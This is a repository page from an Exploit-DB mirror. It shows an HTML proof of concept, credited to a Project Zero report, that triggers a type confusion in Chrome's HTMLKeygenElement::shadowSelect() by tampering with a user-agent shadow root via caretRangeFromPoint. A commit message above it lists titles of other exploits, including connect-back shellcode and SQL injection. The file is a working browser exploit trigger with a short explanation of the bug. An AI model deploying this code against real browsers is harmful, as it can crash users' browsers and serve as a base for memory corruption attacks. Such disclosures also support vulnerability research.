bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/multiple/dos/41215.html
Offensive Security 893d590404 DB: 2017-02-02 
12 new exploits

PHP 5.2.0 (Windows x86) - (PHP_win32sti) Local Buffer Overflow
PHP 5.2.0 (Windows x86) - 'PHP_win32sti' Local Buffer Overflow

Apple Safari 4.0.3 (Windows x86) - CSS Remote Denial of Service
Apple Safari 4.0.3 (Windows x86) - 'CSS' Remote Denial of Service (1)

PHP 5.3.0 - getopt() Denial of Service
PHP 5.3.0 - 'getopt()' Denial of Service

Apple Safari 4.0.3 (Windows x86) - CSS Remote Denial of Service
Apple Safari 4.0.3 (Windows x86) - 'CSS' Remote Denial of Service (2)

PHP 4.3.x/5.0 - openlog() Buffer Overflow
PHP 4.3.x/5.0 - 'openlog()' Buffer Overflow
Google Android - 'cfp_ropp_new_key_reenc' and 'cfp_ropp_new_key' RKP Memory Corruption
Google Android -  Unprotected MSRs in EL1 RKP Privilege Escalation
Apple WebKit - 'HTMLFormElement::reset()' Use-After Free
Google Chrome - 'HTMLKeygenElement::shadowSelect()' Type Confusion
Apple WebKit - 'HTMLKeygenElement' Type Confusion
Apple WebKit - Type Confusion in RenderBox with Accessibility Enabled
Google Android - RKP Information Disclosure via s2-remapping Physical Ranges
QNAP NVR/NAS - Buffer Overflow

Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - UDEV < 1.4.1 Privilege Escalation (1)
Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV < 1.4.1 - Privilege Escalation (1)

Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04) - UDEV < 141 Privilege Escalation (2)
Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04) UDEV < 1.4.1 - Privilege Escalation (2)

PHP 5.2.9 (Windows x86) - Local Safemod Bypass Exploit
PHP 5.2.9 (Windows x86) - Local Safemod Bypass

Linux udev - Netlink Privilege Escalation (Metasploit)
Linux Kernel UDEV < 1.4.1 - Netlink Privilege Escalation (Metasploit)

Google Android - RKP EL1 Code Loading Bypass

Linux/CRISv32 - Axis Communication Connect Back Shellcode (189 bytes)

Syntax Desktop 2.7 - (synTarget) Local File Inclusion
Syntax Desktop 2.7 - 'synTarget' Parameter Local File Inclusion
Joomla! Component JTAG Calendar 6.2.4 - 'search' Parameter SQL Injection
LogoStore - 'query' Parameter SQL Injection
2017-02-02 05:01:18 +00:00

15 lines
No EOL
646 B
HTML
Executable file
Raw Blame History

<!-- Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=999 -->
<keygen id="keygen_element" style="position:absolute; height: 100px; width: 100px;">
<script>
var range = document.caretRangeFromPoint(50, 50);
var shadow_tree_container = range.commonAncestorContainer;
shadow_tree_container.prepend("foo");
keygen_element.disabled = true;
</script>
<!--
What happens here:
1. caretRangeFromPoint() allows accessing (and modifying) userAgentShadowRoot from JavaScript
2. HTMLKeygenElement::shadowSelect() blindly casts the first child of the userAgentShadowRoot to HTMLSelectElement without checking the Node type.
-->
Reference in a new issue View git blame Copy permalink